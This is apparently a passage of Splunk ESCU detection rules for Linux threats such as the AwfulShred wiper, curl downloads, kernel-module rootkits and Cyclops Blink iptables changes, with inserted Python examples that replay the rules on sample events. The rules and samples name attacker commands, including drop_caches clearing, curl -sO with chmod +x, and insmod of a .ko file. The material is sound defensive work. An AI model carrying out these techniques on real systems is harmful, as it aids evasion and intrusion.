action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network admin can terminate a process using this linux command. Filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Impair Defenses Process Kill - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Impair Defenses Process Kill - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 
realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ( "pgrep", "pkill") Processes.process = "*pkill *" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_impair_defenses_process_kill_filter` [ESCU - Linux Indicator Removal Clear Cache - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for processes that clear or free page cache in Linux system host. This technique was seen in Awfulshred malware wiper that tries to clear the cache using kernel system request drop_caches while wiping all files in the targeted host. This TTP detection can be a good indicator of user or process tries to clear page cache to delete tracks or might be a wiper like Awfulshred. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for processes that clear or free page cache in Linux system host. This technique was seen in Awfulshred malware wiper that tries to clear the cache using kernel system request drop_caches while wiping all files in the targeted host. This TTP detection can be a good indicator of user or process tries to clear page cache to delete tracks or might be a wiper like Awfulshred. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. 
Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Indicator Removal Clear Cache - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ clear cache using kernel drop cache system request in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Indicator Removal Clear Cache - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for processes that clear or free page cache in Linux system host. 
This technique was seen in Awfulshred malware wiper that tries to clear the cache using kernel system request drop_caches while wiping all files in the targeted host. This TTP detection can be a good indicator of user or process tries to clear page cache to delete tracks or might be a wiper like Awfulshred. action.notable.param.rule_title = Linux Indicator Removal Clear Cache action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("dash", "sudo", "bash") AND Processes.process IN("* echo 3 > *", "* echo 2 > *","* echo 1 > *") AND Processes.process = "*/proc/sys/vm/drop_caches" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_indicator_removal_clear_cache_filter` [ESCU - Linux Indicator Removal Service File Deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious linux processes that delete service unit configuration files. This technique was seen in several malware to delete service configuration files to corrupt a services or security product as part of its defense evasion. 
This TTP detection can be a good indicator of possible malware try to kill several services or a wiper like AwfulShred shell script that wipes the targeted linux host action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious linux processes that delete service unit configuration files. This technique was seen in several malware to delete service configuration files to corrupt a services or security product as part of its defense evasion. This TTP detection can be a good indicator of possible malware try to kill several services or a wiper like AwfulShred shell script that wipes the targeted linux host action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network admin can delete services unit configuration file as part of normal software installation. Filter is needed. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Indicator Removal Service File Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ has a commandline $process$ to delete service configuration file in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Indicator Removal Service File Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "rm" AND Processes.process = "*rm *" AND Processes.process = "*.service" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id 
Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_indicator_removal_service_file_deletion_filter` [ESCU - Linux Ingress Tool Transfer Hunting - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic hunts for curl and wget being utilized in the environment. This is meant to help with identifying normal usage and potentially malicious. Utilize this query to tune other curl and wget analytics. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic hunts for curl and wget being utilized in the environment. This is meant to help with identifying normal usage and potentially malicious. Utilize this query to tune other curl and wget analytics. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives will be present. This query is meant to help tune other curl and wget analytics. 
action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Ingress Tool Transfer Hunting - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land", "Ingress Tool Transfer"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Ingress Tool Transfer Hunting - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 10, "impact": 10, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=curl OR Processes.process_name=wget) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ingress_tool_transfer_hunting_filter` [ESCU - Linux Ingress Tool Transfer with Curl - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies curl with the command-line switches that are commonly used to download, output, a remote script or binary. 
MetaSploit Framework will combine the -sO switch with | chmod +x to enable a simple one liner to download and set the execute bit to run the file immediately. During triage, review the remote domain and file being downloaded for legitimacy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies curl with the command-line switches that are commonly used to download, output, a remote script or binary. MetaSploit Framework will combine the -sO switch with | chmod +x to enable a simple one liner to download and set the execute bit to run the file immediately. During triage, review the remote domain and file being downloaded for legitimacy. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives will be present. Tune and then change type to TTP. 
action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Ingress Tool Transfer with Curl - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land", "Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ to download a remote file. Review activity for further details. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Ingress Tool Transfer with Curl - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 30, "impact": 40, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl by Processes.dest Processes.user Processes.parent_process_name 
Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process, "(?i)(-O|-sO|-ksO|--output)") | `linux_ingress_tool_transfer_with_curl_filter` [ESCU - Linux Insert Kernel Module Using Insmod Utility - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for inserting of linux kernel module using insmod utility function. This event can detect a installation of rootkit or malicious kernel module to gain elevated privileges to their malicious code and bypassed detections. This Anomaly detection is a good indicator that someone installing kernel module in a linux host either admin or adversaries. filter is needed in this scenario action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for inserting of linux kernel module using insmod utility function. This event can detect a installation of rootkit or malicious kernel module to gain elevated privileges to their malicious code and bypassed detections. This Anomaly detection is a good indicator that someone installing kernel module in a linux host either admin or adversaries. filter is needed in this scenario action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. 
The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-22 action.escu.modification_date = 2021-12-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Insert Kernel Module Using Insmod Utility - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may install kernel module on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Insert Kernel Module Using Insmod Utility - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats 
`security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("kmod", "sudo") AND Processes.process = *insmod* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_insert_kernel_module_using_insmod_utility_filter` [ESCU - Linux Install Kernel Module Using Modprobe Utility - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the possible installation of a Linux kernel module with the modprobe utility. This event can indicate the installation of a rootkit or other malicious kernel module used to run attacker code with elevated privileges and to bypass detections. This anomaly detection is a good indicator that someone, whether an administrator or an adversary, is installing a kernel module on a Linux host; a filter is needed in this scenario. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the possible installation of a Linux kernel module with the modprobe utility. This event can indicate the installation of a rootkit or other malicious kernel module used to run attacker code with elevated privileges and to bypass detections. This anomaly detection is a good indicator that someone, whether an administrator or an adversary, is installing a kernel module on a Linux host; a filter is needed in this scenario. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-22 action.escu.modification_date = 2021-12-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Install Kernel Module Using Modprobe Utility - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may install kernel module on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Install Kernel Module Using Modprobe Utility - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], 
"mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("kmod", "sudo") AND Processes.process = *modprobe* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_install_kernel_module_using_modprobe_utility_filter` [ESCU - Linux Iptables Firewall Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious command lines that modify the iptables firewall settings of a Linux machine. This technique was seen in the Cyclops Blink malware, which modifies the firewall settings of the compromised machine to allow traffic to the TCP ports it uses to communicate with its C2 server. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious command lines that modify the iptables firewall settings of a Linux machine. This technique was seen in the Cyclops Blink malware, which modifies the firewall settings of the compromised machine to allow traffic to the TCP ports it uses to communicate with its C2 server. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
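The two kernel-module rules above (insmod and modprobe) share one shape: `process_name IN("kmod", "sudo")` AND a wildcard on the command line. The following is an added example, not part of the ESCU content, that runs that logic in Python over a handful of constructed `Endpoint.Processes`-style events so the match and the blind spot are both visible. It assumes Splunk's case-insensitive field-value matching (so both sides are lower-cased) and that insmod/modprobe may be reported under the symlink name rather than the resolved `kmod` binary, which depends on the EDR agent; hostnames, users and paths are invented.

```python
import fnmatch
from dataclasses import dataclass


# Constructed stand-in for the CIM Endpoint.Processes fields both rules use.
@dataclass(frozen=True)
class ProcessEvent:
    dest: str
    user: str
    parent_process_name: str
    process_name: str
    process: str  # full command line


# Processes.process_name IN("kmod", "sudo"), shared by both rules.
LOADER_PROCESS_NAMES = frozenset({"kmod", "sudo"})
# The Processes.process = *insmod* and Processes.process = *modprobe* terms.
LOADER_TOOLS = ("insmod", "modprobe")


def spl_match(pattern: str, text: str) -> bool:
    """Splunk '*' wildcard match; lower-cased on both sides to mimic
    Splunk's case-insensitive field-value matching (assumption)."""
    return fnmatch.fnmatchcase(text.lower(), pattern.lower())


def matches_kernel_module_rule(ev: ProcessEvent, tool: str) -> bool:
    """process_name IN("kmod","sudo") AND process = *<tool>*"""
    return ev.process_name in LOADER_PROCESS_NAMES and spl_match(f"*{tool}*", ev.process)


def run_rules(events):
    """(tool, dest, user, process) for every event either rule would emit."""
    return [(tool, ev.dest, ev.user, ev.process)
            for ev in events for tool in LOADER_TOOLS
            if matches_kernel_module_rule(ev, tool)]


def blind_spots(events):
    """Events whose command line names a loader but whose process_name is
    neither kmod nor sudo, so neither rule fires.  insmod and modprobe are
    commonly symlinks to kmod; whether the agent reports the symlink name
    or the resolved binary decides this, and it varies by agent (assumption)."""
    return [ev for ev in events
            if ev.process_name not in LOADER_PROCESS_NAMES
            and any(spl_match(f"*{t}*", ev.process) for t in LOADER_TOOLS)]


# Constructed sample events; hostnames, users and paths are invented.
SAMPLE_EVENTS = [
    ProcessEvent("web01", "root", "bash", "kmod", "insmod /tmp/.x/rk.ko"),
    ProcessEvent("web01", "ops", "bash", "sudo", "sudo modprobe -v nf_conntrack"),
    ProcessEvent("db02", "root", "systemd", "kmod", "/usr/bin/kmod static-nodes --format=tmpfiles"),
    ProcessEvent("db02", "root", "bash", "insmod", "insmod /tmp/rk.ko"),
]

if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print("ALERT", *hit)
    for ev in blind_spots(SAMPLE_EVENTS):
        print("MISSED", ev.dest, ev.process_name, ev.process)
```

The second sample (an operator loading `nf_conntrack` through sudo) fires exactly like the first, which is why the rule text asks for a filter macro; the fourth shows why the `process_name IN("kmod", "sudo")` clause is worth checking against what your agent actually reports.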
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = An administrator may run this command line for auditing and testing purposes; a filter is needed in that scenario. action.escu.creation_date = 2023-04-12 action.escu.modification_date = 2023-04-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Iptables Firewall Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Sandworm Tools", "Cyclops Blink"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may modify iptables firewall on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Iptables Firewall Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Sandworm Tools", "Cyclops Blink"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 
100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*iptables *" AND Processes.process = "* --dport *" AND Processes.process = "* ACCEPT*" AND Processes.process = "*&>/dev/null*" AND Processes.process = "* tcp *" AND NOT(Processes.parent_process_path IN("/bin/*", "/lib/*", "/usr/bin/*", "/sbin/*")) by Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest _time span=10s Processes.user Processes.parent_process_name Processes.parent_process_path Processes.process_path | rex field=Processes.process "--dport (?<port>3269|636|989|994|995|8443)" | stats min(firstTime) as firstTime max(lastTime) as lastTime values(Processes.process) as processes_exec values(port) as ports values(Processes.process_guid) as guids values(Processes.process_id) as pids dc(port) as port_count count by Processes.process_name Processes.parent_process_name Processes.parent_process_id Processes.dest Processes.user Processes.parent_process_path Processes.process_path | where port_count >=3 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_iptables_firewall_modification_filter` [ESCU - Linux Java Spawning Shell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to CVE-2021-44228 (Log4Shell). The shells included in the macro are "sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh", "tcsh", "ion", "eshell". Upon triage, review parallel processes and command-line arguments to determine legitimacy. 
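The iptables rule above is the one search in this group that aggregates rather than matching single events: five wildcard terms select candidate command lines, parents under system paths are excluded, a `rex` captures the `--dport` value into a field named `port`, and a `stats ... dc(port) as port_count` per actor is compared against 3. The following is an added Python example, not ESCU code, that replays that pipeline over constructed events. Two assumptions are written into it: the `&>/dev/null` term only ever appears when the whole string is passed through `sh -c`, so the samples are shell wrappers; and because the final `stats` does not group by `_time`, the intermediate `span=10s` bucketing is collapsed and the distinct-port count effectively runs over the whole search window. Hostnames, PIDs and paths are invented.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


# Constructed stand-in for the Endpoint.Processes fields the rule groups on.
@dataclass(frozen=True)
class ProcessEvent:
    dest: str
    user: str
    parent_process_name: str
    parent_process_id: int
    parent_process_path: str
    process_name: str
    process_path: str
    process: str  # full command line


# The five wildcard terms of the tstats where-clause, kept as substrings
# with their surrounding spaces, exactly as the rule writes them.
REQUIRED_SUBSTRINGS = ("iptables ", " --dport ", " ACCEPT", "&>/dev/null", " tcp ")
# NOT(Processes.parent_process_path IN("/bin/*", "/lib/*", "/usr/bin/*", "/sbin/*"))
TRUSTED_PARENT_PREFIXES = ("/bin/", "/lib/", "/usr/bin/", "/sbin/")
# The rule's rex; Splunk's (?<port>...) named group is (?P<port>...) in Python.
DPORT_RE = re.compile(r"--dport (?P<port>3269|636|989|994|995|8443)")
PORT_COUNT_THRESHOLD = 3  # | where port_count >= 3


def is_candidate(ev: ProcessEvent) -> bool:
    """The where-clause: all five substrings present, parent not under a system path."""
    return (all(s in ev.process for s in REQUIRED_SUBSTRINGS)
            and not ev.parent_process_path.startswith(TRUSTED_PARENT_PREFIXES))


def ports_by_actor(events):
    """Distinct matched ports per (dest, user, parent, paths), i.e. the
    dc(port) of the rule's stats.  A port outside the rex list leaves
    port null, which dc() ignores, so it is skipped here too."""
    seen = defaultdict(set)
    for ev in events:
        if not is_candidate(ev):
            continue
        m = DPORT_RE.search(ev.process)
        if m is None:
            continue
        key = (ev.dest, ev.user, ev.parent_process_name, ev.parent_process_id,
               ev.parent_process_path, ev.process_path)
        seen[key].add(int(m.group("port")))
    return seen


def alerts(events):
    """Actors whose distinct-port count reaches the threshold."""
    return {k: sorted(v) for k, v in ports_by_actor(events).items()
            if len(v) >= PORT_COUNT_THRESHOLD}


def _sh_event(user, parent_name, ppid, parent_path, port):
    # Constructed event: the redirect is only in the command line when the
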